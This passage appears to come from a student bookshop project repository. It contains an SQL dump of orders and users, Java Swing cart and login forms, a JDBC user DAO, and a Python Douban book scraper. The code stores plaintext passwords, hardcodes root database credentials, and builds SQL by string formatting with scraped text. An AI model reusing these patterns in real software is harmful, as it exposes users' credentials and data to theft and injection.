NULL,\n `status` int(11) DEFAULT '1',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=132 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of order\n-- ----------------------------\nINSERT INTO `order` VALUES ('97', '0', '1', '784.99', '-1');\nINSERT INTO `order` VALUES ('98', '0', '1', '609.95', '-1');\nINSERT INTO `order` VALUES ('99', '0', '1', '966.00', '-1');\nINSERT INTO `order` VALUES ('100', '0', '1', '100000.00', '-1');\nINSERT INTO `order` VALUES ('101', '0', '1', '100000.00', '-1');\nINSERT INTO `order` VALUES ('102', '0', '1', '100000.00', '-1');\nINSERT INTO `order` VALUES ('103', '0', '1', '4800000.00', '-1');\nINSERT INTO `order` VALUES ('104', '0', '1', '1000000.00', '2');\nINSERT INTO `order` VALUES ('105', '0', '1', '1000000.00', '2');\nINSERT INTO `order` VALUES ('106', '0', '2', '100000.00', '2');\nINSERT INTO `order` VALUES ('107', '0', '2', '300000.00', '2');\nINSERT INTO `order` VALUES ('108', '0', '1', '100000.00', '2');\nINSERT INTO `order` VALUES ('109', '0', '1', '80.00', '2');\nINSERT INTO `order` VALUES ('110', '0', '1', '100000.00', '2');\nINSERT INTO `order` VALUES ('111', '0', '1', '100000.00', '-1');\nINSERT INTO `order` VALUES ('112', '0', '0', '100000.00', '2');\nINSERT INTO `order` VALUES ('113', '0', '2', '80.00', '-1');\nINSERT INTO `order` VALUES ('114', '0', '2', '40.00', '-1');\nINSERT INTO `order` VALUES ('115', '0', '1', '100058.00', '-1');\nINSERT INTO `order` VALUES ('116', '0', '5', '1400000.00', '-1');\nINSERT INTO `order` VALUES ('117', '0', '4', '100040.00', '-1');\nINSERT INTO `order` VALUES ('118', '0', '4', '18.00', '-1');\nINSERT INTO `order` VALUES ('119', '0', '4', '100000.00', '-1');\nINSERT INTO `order` VALUES ('120', '0', '4', '100000.00', '-1');\nINSERT INTO `order` VALUES ('121', '0', '4', '100000.00', '-1');\nINSERT INTO `order` VALUES ('122', '0', '4', '40.00', '2');\nINSERT INTO `order` VALUES ('123', '0', '6', '58.00', '2');\nINSERT INTO `order` VALUES ('124', '0', '4', '40.00', '2');\nINSERT INTO `order` VALUES ('125', '0', '4', '40.00', '2');\nINSERT INTO `order` VALUES ('126', '0', '4', '18.00', '2');\nINSERT INTO `order` VALUES ('127', '0', '4', '18.00', '2');\nINSERT INTO `order` VALUES ('128', '0', '4', '40.00', '2');\nINSERT INTO `order` VALUES ('129', '0', '4', '1040.00', '2');\nINSERT INTO `order` VALUES ('130', '0', '1', '170.00', '-1');\nINSERT INTO `order` VALUES ('131', '0', '1', '50.00', '1');\n\n-- ----------------------------\n-- Table structure for `orderitem`\n-- ----------------------------\nDROP TABLE IF EXISTS `orderitem`;\nCREATE TABLE `orderitem` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `book_id` int(11) NOT NULL,\n `order_id` int(11) NOT NULL,\n `price_sum` double NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=68 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of orderitem\n-- ----------------------------\nINSERT INTO `orderitem` VALUES ('23', '1', '1', '97', '84.99149999999999');\nINSERT INTO `orderitem` VALUES ('24', '1', '2', '97', '200');\nINSERT INTO `orderitem` VALUES ('25', '1', '3', '97', '500');\nINSERT INTO `orderitem` VALUES ('26', '1', '1', '98', '509.94899999999996');\nINSERT INTO `orderitem` VALUES ('27', '1', '2', '98', '100');\nINSERT INTO `orderitem` VALUES ('28', '1', '4', '99', '66');\nINSERT INTO `orderitem` VALUES ('29', '1', '5', '99', '900');\nINSERT INTO `orderitem` VALUES ('30', '1', '20', '100', '100000');\nINSERT INTO `orderitem` VALUES ('31', '1', '20', '101', '100000');\nINSERT INTO `orderitem` VALUES ('32', '1', '20', '102', '100000');\nINSERT INTO `orderitem` VALUES ('33', '1', '20', '103', '4800000');\nINSERT INTO `orderitem` VALUES ('34', '1', '20', '104', '1000000');\nINSERT INTO `orderitem` VALUES ('35', '1', '20', '105', '1000000');\nINSERT INTO `orderitem` VALUES ('36', '2', '23', '106', '100000');\nINSERT INTO `orderitem` VALUES ('37', '2', '21', '107', '200000');\nINSERT INTO `orderitem` VALUES ('38', '2', '23', '107', '100000');\nINSERT INTO `orderitem` VALUES ('39', '1', '21', '108', '100000');\nINSERT INTO `orderitem` VALUES ('40', '1', '26', '109', '80');\nINSERT INTO `orderitem` VALUES ('41', '1', '21', '110', '100000');\nINSERT INTO `orderitem` VALUES ('42', '1', '21', '111', '100000');\nINSERT INTO `orderitem` VALUES ('43', '2', '21', '112', '100000');\nINSERT INTO `orderitem` VALUES ('44', '2', '26', '113', '80');\nINSERT INTO `orderitem` VALUES ('45', '2', '26', '114', '40');\nINSERT INTO `orderitem` VALUES ('46', '1', '21', '115', '100000');\nINSERT INTO `orderitem` VALUES ('47', '1', '26', '115', '40');\nINSERT INTO `orderitem` VALUES ('48', '1', '29', '115', '18');\nINSERT INTO `orderitem` VALUES ('49', '5', '21', '116', '1400000');\nINSERT INTO `orderitem` VALUES ('50', '4', '21', '117', '100000');\nINSERT INTO `orderitem` VALUES ('51', '4', '26', '117', '40');\nINSERT INTO `orderitem` VALUES ('52', '4', '29', '118', '18');\nINSERT INTO `orderitem` VALUES ('53', '4', '21', '119', '100000');\nINSERT INTO `orderitem` VALUES ('54', '4', '21', '120', '100000');\nINSERT INTO `orderitem` VALUES ('55', '4', '21', '121', '100000');\nINSERT INTO `orderitem` VALUES ('56', '4', '26', '122', '40');\nINSERT INTO `orderitem` VALUES ('57', '6', '29', '123', '18');\nINSERT INTO `orderitem` VALUES ('58', '6', '26', '123', '40');\nINSERT INTO `orderitem` VALUES ('59', '4', '26', '124', '40');\nINSERT INTO `orderitem` VALUES ('60', '4', '26', '125', '40');\nINSERT INTO `orderitem` VALUES ('61', '4', '29', '126', '18');\nINSERT INTO `orderitem` VALUES ('62', '4', '29', '127', '18');\nINSERT INTO `orderitem` VALUES ('63', '4', '26', '128', '40');\nINSERT INTO `orderitem` VALUES ('64', '4', '26', '129', '1040');\nINSERT INTO `orderitem` VALUES ('65', '1', '26', '130', '160');\nINSERT INTO `orderitem` VALUES ('66', '1', '21', '130', '10');\nINSERT INTO `orderitem` VALUES ('67', '1', '26', '131', '50');\n\n-- ----------------------------\n-- Table structure for `user`\n-- ----------------------------\nDROP TABLE IF EXISTS `user`;\nCREATE TABLE `user` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `login_name` varchar(100) NOT NULL,\n `password` varchar(100) NOT NULL,\n `name` varchar(100) DEFAULT NULL,\n `sex` varchar(10) DEFAULT NULL,\n `email` varchar(100) DEFAULT NULL,\n `tel` varchar(100) DEFAULT NULL,\n `level` int(11) DEFAULT NULL,\n `address` varchar(100) DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of user\n-- ----------------------------\nINSERT INTO `user` VALUES ('1', 'luo', '123456', '华仔', '男', '[email protected]', '123456', '-1', '广西北海');\nINSERT INTO `user` VALUES ('2', 'luo', '123456', '华仔', '男', '[email protected]', '123456', '1', '广西北海');\nINSERT INTO `user` VALUES ('3', 'huazai', '123456', '远华', '无', '', '', '1', '');\nINSERT INTO `user` VALUES ('4', 'hua', '123456', '语言', '男', '2063126', '9909980', '-1', '北海');\nINSERT INTO `user` VALUES ('5', 'yuan', '123', '', '无', '', '', null, '');\nINSERT INTO `user` VALUES ('6', 'admin', '123', 'nini', '男', '65487', '987987', '0', '');\nINSERT INTO `user` VALUES ('7', 'luo', '123456', '', '无', '', '', null, '');\n"
},
{
"alpha_fraction": 0.6435986161231995,
"alphanum_fraction": 0.6435986161231995,
"avg_line_length": 13.449999809265137,
"blob_id": "2e73a2cce7a0fd471dc5ba2de68098c2c8fbb3d2",
"content_id": "a4d4dd3939aa8a8d534ec2eb3c7b0308b6bb0c6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 20,
"path": "/src/com/bookshop/dao/IdeaDao.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao;\n\nimport java.util.List;\n\nimport com.bookshop.entity.Ideas;\n\npublic interface IdeaDao {\n // insert\n int insert(Ideas news);\n\n // delete\n int delete(Integer id);\n\n // update\n int update(Ideas news);\n\n // queryAll\n List<Ideas> queryAll();\n\n}\n"
},
{
"alpha_fraction": 0.5546433925628662,
"alphanum_fraction": 0.5840944051742554,
"avg_line_length": 36.33716583251953,
"blob_id": "37312ea52a05460ce6868df5b2754265835f25a5",
"content_id": "d5f1a0e848bb1cd26fe0c99db8008b0e1e785345",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 10205,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 261,
"path": "/src/com/bookshop/ui/userForm/ShopingCatForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Thu Jul 02 12:13:33 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport java.awt.event.*;\n\nimport com.bookshop.entity.Book;\nimport com.bookshop.entity.Cart;\nimport com.bookshop.entity.Order;\nimport com.bookshop.service.impl.BookServiceImpl;\nimport com.bookshop.service.impl.CartServiceImpl;\nimport com.bookshop.service.impl.OrderServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class ShopingCatForm extends JFrame {\n public static void main(String[] args) {\n ShopingCatForm shopingCatForm = new ShopingCatForm();\n shopingCatForm.setVisible(true);\n }\n\n int userId = UserData.userId;\n Book book;\n BookServiceImpl bookService = new BookServiceImpl();\n CartServiceImpl cartService = new CartServiceImpl();\n\n double priceSum;\n\n\n public ShopingCatForm() {\n initComponents();\n }\n\n public void click() {\n table1.setModel(new DefaultTableModel(\n select(),\n new String[]{\n \"ID\", \"bookID\", \"\\u56fe\\u4e66\\u540d\\u79f0\", \"\\u56fe\\u4e66\\u4ef7\\u683c\", \"\\u56fe\\u4e66\\u6570\\u91cf\", \"\\u56fe\\u4e66\\u603b\\u4ef7\\u683c\",\"状态\"\n }\n ) {\n\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return false;\n }\n });\n scrollPane1.setViewportView(table1);\n\n\n }\n\n private String[][] select() {\n\n List<Cart> carts = cartService.queryAllByUserId(userId);\n\n String[][] datas = new String[carts.size()][7];\n for (int i = 0; i < datas.length; i++) {\n datas[i][0] = carts.get(i).getId().toString();\n datas[i][1] = carts.get(i).getBookId().toString();\n datas[i][2] = carts.get(i).getBookName();\n datas[i][3] = carts.get(i).getBookPrice().toString();\n datas[i][4] = carts.get(i).getBookNum().toString();\n book = bookService.queryById(carts.get(i).getBookId());\n Double discount = book.getDiscount();\n priceSum = carts.get(i).getBookPrice() * carts.get(i).getBookNum() * discount;\n datas[i][5] = (carts.get(i).getBookPrice() * carts.get(i).getBookNum() * discount) + \"\";\n datas[i][6] = book.getFlag().toString();\n\n }\n //---- table1 ---\n return datas;\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n\n int index = table1.getSelectedRow();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n Integer id = Integer.parseInt(model.getValueAt(index, 0).toString());\n Integer bookId = Integer.parseInt(model.getValueAt(index, 1).toString());\n Integer bookNum = Integer.parseInt(spinner1.getValue().toString());\n Double bookPrice = Double.parseDouble(model.getValueAt(index, 3).toString());\n String bookName = model.getValueAt(index, 2).toString();\n\n\n Cart cart = new Cart(id, userId, bookId, bookNum, bookPrice, bookName);\n if (cartService.update(cart) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:\" + cart.getBookName() + \"修改成功!\");\n click();\n } else {\n JOptionPane.showMessageDialog(null, \"提示:修改失败!\");\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择需要修改的书籍!\");\n }\n\n\n }\n\n private void delButtonActionPerformed(ActionEvent e) {\n int index = table1.getSelectedRow();\n // 如果下标不为-1,则选中行为数据行\n if (index != -1) {\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n Integer id = Integer.parseInt(model.getValueAt(index, 0).toString());\n\n if (cartService.delete(id) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:删除成功!\");\n click();\n } else {\n JOptionPane.showMessageDialog(null, \"提示:删除失败!\");\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择需要删除的书籍!\");\n }\n }\n\n private void clearButton3ActionPerformed(ActionEvent e) {\n // 清空事件\n JOptionPane.showMessageDialog(null, \"提示:确定清空购物车?\");\n cartService.clearCart(userId);\n click();\n JOptionPane.showMessageDialog(null, \"提示:清空成功!\");\n\n }\n\n //结算\n private void settleAccountsbutton2ActionPerformed(ActionEvent e) {\n // TODO add your code here\n int[] selectedRows = table1.getSelectedRows();\n UserData.arr = new String[selectedRows.length][7];\n double priceSums = 0.0;\n if (selectedRows.length > 0) {\n for (int index = 0; index < selectedRows.length; index++) {\n\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n Integer id = Integer.parseInt(model.getValueAt(index, 0).toString());\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n UserData.arr[index][0] = (model.getValueAt(index, 0)).toString();\n System.out.println(UserData.arr[index][0]);\n UserData.arr[index][1] = (model.getValueAt(index, 1)).toString();\n UserData.arr[index][2] = (model.getValueAt(index, 2)).toString();\n UserData.arr[index][3] = (model.getValueAt(index, 3)).toString();\n UserData.arr[index][4] = (model.getValueAt(index, 4)).toString();\n UserData.arr[index][5] = (model.getValueAt(index, 5)).toString();\n UserData.arr[index][6] = (model.getValueAt(index, 6)).toString();\n cartService.delete(id);\n }\n\n click();\n }\n OrderForm orderForm = new OrderForm();\n orderForm.click();\n this.setVisible(false);\n orderForm.setVisible(true);\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n scrollPane1 = new JScrollPane();\n table1 = new JTable();\n button1 = new JButton();\n settleAccountsbutton2 = new JButton();\n spinner1 = new JSpinner();\n delButton = new JButton();\n clearButton3 = new JButton();\n\n //======== this ========\n setTitle(\"\\u8d2d\\u7269\\u8f66\");\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== scrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][] {\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n {null, null, null, null, null, null},\n },\n new String[] {\n \"ID\", \"bookID\", \"\\u56fe\\u4e66\\u540d\\u79f0\", \"\\u56fe\\u4e66\\u4ef7\\u683c\", \"\\u56fe\\u4e66\\u6570\\u91cf\", \"\\u56fe\\u4e66\\u603b\\u4ef7\\u683c\"\n }\n ) {\n boolean[] columnEditable = new boolean[] {\n false, false, false, false, false, false\n };\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n scrollPane1.setViewportView(table1);\n }\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(50, 15, 625, 310);\n\n //---- button1 ----\n button1.setText(\"\\u4fee\\u6539\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(160, 345), button1.getPreferredSize()));\n\n //---- settleAccountsbutton2 ----\n settleAccountsbutton2.setText(\"\\u7ed3\\u7b97\");\n settleAccountsbutton2.addActionListener(e -> settleAccountsbutton2ActionPerformed(e));\n contentPane.add(settleAccountsbutton2);\n settleAccountsbutton2.setBounds(new Rectangle(new Point(585, 345), settleAccountsbutton2.getPreferredSize()));\n\n //---- spinner1 ----\n spinner1.setModel(new SpinnerNumberModel(1, 1, 50, 1));\n contentPane.add(spinner1);\n spinner1.setBounds(30, 345, 128, spinner1.getPreferredSize().height);\n\n //---- delButton ----\n delButton.setText(\"\\u5220\\u9664\");\n delButton.addActionListener(e -> delButtonActionPerformed(e));\n contentPane.add(delButton);\n delButton.setBounds(new Rectangle(new Point(295, 345), delButton.getPreferredSize()));\n\n //---- clearButton3 ----\n clearButton3.setText(\"\\u6e05\\u7a7a\");\n clearButton3.addActionListener(e -> clearButton3ActionPerformed(e));\n contentPane.add(clearButton3);\n clearButton3.setBounds(new Rectangle(new Point(435, 345), clearButton3.getPreferredSize()));\n\n contentPane.setPreferredSize(new Dimension(725, 435));\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane scrollPane1;\n private JTable table1;\n private JButton button1;\n private JButton settleAccountsbutton2;\n private JSpinner spinner1;\n private JButton delButton;\n private JButton clearButton3;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.508987307548523,
"alphanum_fraction": 0.5295922756195068,
"avg_line_length": 31.55714225769043,
"blob_id": "bb2709319fe0cc61536b6b673777a24d7b357432",
"content_id": "2cb62a7daa6e9b3f3f48fdf543207637f3a37466",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2417,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 70,
"path": "/charrobot/DEMO01/CS1/douban.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import requests\nfrom lxml import etree\n\n# import xlrd\nimport pymysql\n\ntry:\n db = pymysql.connect(\n host = 'localhost',\n port = 3306,\n user= 'root',\n password = 'root',\n db = 'bookshop',\n charset = 'utf8'\n )\n #创建游标\n cur = db.cursor()\nexcept Exception as e:\n print(e)\nelse:\n print('连接成功:{}'.format(cur))\ndef main(name:str):\n # 豆瓣图书爬取信息的标签以及页数\n url = 'https://book.douban.com/tag/%s?start={}&type=T' % name\n\n # 请求头信息\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'Upgrade-Insecure-Requests': '1',\n }\n\n for i in range(2):\n # 发送请求\n url = url.format(i)\n response = requests.get(url, headers=headers).text\n\n # xpath的解析\n html = etree.HTML(response)\n\n # 获取书籍详情页链接\n base_url = html.xpath('//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/h2/a/@href')\n\n # 获取书名\n bookname = html.xpath('//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/h2/a/@title')\n\n # 获取出版信息\n pub = html.xpath('//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/div[@class=\"pub\"]')\n\n # 豆瓣评分\n rating = html.xpath(\n '//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/div[@class=\"star clearfix\"]/span[@class=\"rating_nums\"]')\n # 评价人数\n nums = html.xpath(\n '//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/div[@class=\"star clearfix\"]/span[@class=\"pl\"]')\n\n # 简介\n page = html.xpath('//ul[@class=\"subject-list\"]/li/div[@class=\"info\"]/p/text()')\n\n # 存储信息\n\n for cnt in range(20):\n # insert = (\"INSERT INTO `booklist` (name,link,publicer,grade,num,content) VALUES ('%s','%s','%s',%s,%s,%s)\" % (\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"))\n try:\n insert = (\"INSERT INTO `booklist` (name,link,publicer,grade,num,content) VALUES ('%s','%s','%s','%s','%s','%s')\" % (\n \"\".join(bookname[cnt]),\"\".join(base_url[cnt]), pub[cnt].text.strip(), \"\".join(rating[cnt].text), \"\".join(nums[cnt].text.strip()), \"\".join(page[cnt][7:].strip())))\n cur.execute(insert)\n db.commit()\n except:\n pass\n db.close()\n\n\n"
},
{
"alpha_fraction": 0.5420162677764893,
"alphanum_fraction": 0.5482184290885925,
"avg_line_length": 34.59740447998047,
"blob_id": "78391496723844e367360b17df4e0b8488c8b38f",
"content_id": "d924c301f2e89366c58efdbb19d684e6a7a273d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 8311,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 231,
"path": "/src/com/bookshop/dao/impl/UserDaoImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao.impl;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport com.bookshop.dao.UserDao;\nimport com.bookshop.entity.User;\nimport com.bookshop.util.JDBCUtils;\n\npublic class UserDaoImpl implements UserDao {\n\n public static void main(String[] args) {\n }\n\n @Override\n public int insert(User user) {\n String sql = \"INSERT INTO `User` (`login_name`, `password`, `name`, `sex`, `email`, `tel`,`address`) VALUES (?, ?, ?, ?, ?, ?, ?)\";\n // 获取连接\n Connection connection = JDBCUtils.getConnection();\n // 语句执行平台\n PreparedStatement preparedStatement = null;\n // 记录受影响的行数\n int result = 0;\n try {\n // 获得预编译对象后\n preparedStatement = connection.prepareStatement(sql);\n // 给?赋值\n preparedStatement.setString(1, user.getLoginName());\n preparedStatement.setString(2, user.getPassword());\n preparedStatement.setString(3, user.getName());\n preparedStatement.setString(4, user.getSex());\n preparedStatement.setString(5, user.getEmail());\n preparedStatement.setString(6, user.getTel());\n// preparedStatement.setInt(7, user.getLevel());\n preparedStatement.setString(7, user.getAddress());\n\n // 执行sql语句 DML\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n // 资源的关闭\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n // 对结果的处理\n return result;\n }\n\n @Override\n public int delete(Integer id) {\n String sql = \"DELETE FROM `User` WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setInt(1, id);\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n\n return result;\n }\n\n @Override\n public int update(User user) {\n String sql = \"UPDATE `User` SET `login_name` = ?, `password` = ?, `name` = ?, `sex` = ?, `email` = ?, `tel` = ?, `level` =?,`address`= ? WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setString(1, user.getLoginName());\n preparedStatement.setString(2, user.getPassword());\n preparedStatement.setString(3, user.getName());\n preparedStatement.setString(4, user.getSex());\n preparedStatement.setString(5, user.getEmail());\n preparedStatement.setString(6, user.getTel());\n preparedStatement.setInt(7, user.getLevel());\n preparedStatement.setString(8, user.getAddress());\n preparedStatement.setInt(9, user.getId());\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n\n return result;\n }\n\n @Override\n public List<User> queryAll() {\n // DQL:Connection PreparedStatement ResultSet\n String sql = \"SELECT * FROM `User`\";\n List<User> list = new ArrayList<User>();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n resultSet = preparedStatement.executeQuery();\n while (resultSet.next()) {\n User user = new User();\n user.setId(resultSet.getInt(1));\n user.setLoginName(resultSet.getString(2));\n user.setPassword(resultSet.getString(3));\n user.setName(resultSet.getString(4));\n user.setSex(resultSet.getString(5));\n user.setEmail(resultSet.getString(6));\n user.setTel(resultSet.getString(7));\n user.setLevel(resultSet.getInt(8));\n user.setAddress(resultSet.getString(9));\n list.add(user);\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return list;\n }\n\n @Override\n public User queryById(Integer id) {\n String sql = \"SELECT * FROM `User` WHERE `id` = ?\";\n User user = new User();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setInt(1, id);\n resultSet = preparedStatement.executeQuery();\n\n if (resultSet.next()) {\n user.setId(resultSet.getInt(1));\n user.setLoginName(resultSet.getString(2));\n user.setPassword(resultSet.getString(3));\n user.setName(resultSet.getString(4));\n user.setSex(resultSet.getString(5));\n user.setEmail(resultSet.getString(6));\n user.setTel(resultSet.getString(7));\n user.setLevel(resultSet.getInt(8));\n user.setAddress(resultSet.getString(9));\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return user;\n }\n\n @Override\n public User login(User user) {\n String sql = \"SELECT * FROM `user` WHERE `login_name` = ? AND `password` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setString(1, user.getLoginName());\n preparedStatement.setString(2, user.getPassword());\n\n resultSet = preparedStatement.executeQuery();\n if (resultSet.next()) {\n user.setId(resultSet.getInt(1));\n user.setLoginName(resultSet.getString(2));\n user.setPassword(resultSet.getString(3));\n user.setName(resultSet.getString(4));\n user.setSex(resultSet.getString(5));\n user.setEmail(resultSet.getString(6));\n user.setTel(resultSet.getString(7));\n user.setLevel(resultSet.getInt(8));\n user.setAddress(resultSet.getString(9));\n } else {\n user = null;\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return user;\n }\n\n}\n"
},
{
"alpha_fraction": 0.6425140500068665,
"alphanum_fraction": 0.6636475920677185,
"avg_line_length": 40.40340805053711,
"blob_id": "e045b8c476526ae593317d5d37df128d64a32582",
"content_id": "6d192bd1e3666eea270655f98baa75bbf851b899",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7441,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 176,
"path": "/src/com/bookshop/ui/publicForm/LoginFrame.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Wed Jul 01 17:44:38 CST 2020\n */\n\npackage com.bookshop.ui.publicForm;\n\nimport com.bookshop.entity.Admin;\nimport com.bookshop.entity.User;\nimport com.bookshop.service.impl.AdminServiceImpl;\nimport com.bookshop.service.impl.UserServiceImpl;\nimport com.bookshop.ui.AdminForm.AdminMainForm;\nimport com.bookshop.ui.userForm.UserMainFrame;\nimport com.bookshop.ui.userForm.UserRegisterFrame;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class LoginFrame extends JFrame {\n public static void main(String[] args) {\n LoginFrame loginFrame = new LoginFrame();\n loginFrame.setVisible(true);\n }\n public LoginFrame() {\n initComponents();\n }\n\n private void loginButtonUserActionPerformed(ActionEvent e) {\n // TODO add your code here\n String name= loginTextField.getText();\n String Password=loginPasswordField.getText();\n UserServiceImpl userService = new UserServiceImpl();\n User user = new User(name, Password);\n System.out.println(user);\n User u = userService.login(user);\n System.out.println(u);\n System.out.println(u);\n\n if (u == null) {\n JOptionPane.showMessageDialog(null, \"提示:用户名或密码错误!\");\n } else if (u.getLevel()==-1){\n JOptionPane.showMessageDialog(null, \"提示:用户名或密码错误!\");\n }\n else {\n // 登录成功,从登录窗体切换主窗体\n this.setVisible(false);\n UserData.userId=user.getId();\n UserData.Sign=\"user\";\n System.out.println(UserData.userId);\n JOptionPane.showMessageDialog(null, \"登录成功\");\n UserMainFrame userMainFrame = new UserMainFrame();\n userMainFrame.setVisible(true);\n userMainFrame.showData();\n\n }\n }\n\n private void loginButtonAdminActionPerformed(ActionEvent e) {\n String name= loginTextField.getText();\n String Password=loginPasswordField.getText();\n AdminServiceImpl adminService = new AdminServiceImpl();\n Admin admin = new Admin(name, Password);\n System.out.println(admin);\n Admin admin2 = adminService.login(admin);\n// Admin admin3 = adminService.q(admin);\n\n if (admin2 == null) {\n JOptionPane.showMessageDialog(null, \"提示:用户名或密码错误!\");\n } else {\n // 登录成功,从登录窗体切换主窗体\n UserData.adminId=admin2.getId();\n UserData.Sign=\"Admin\";\n System.out.println(UserData.userId);\n this.setVisible(false);\n JOptionPane.showMessageDialog(null, \"登录成功\");\n AdminMainForm adminMainForm = new AdminMainForm();\n adminMainForm.setVisible(true);\n }\n }\n\n private void loginButtonRegisterActionPerformed(ActionEvent e) {\n // TODO add your code here\n UserRegisterFrame userRegisterFrame = new UserRegisterFrame();\n userRegisterFrame.setVisible(true);\n this.setVisible(false);\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT 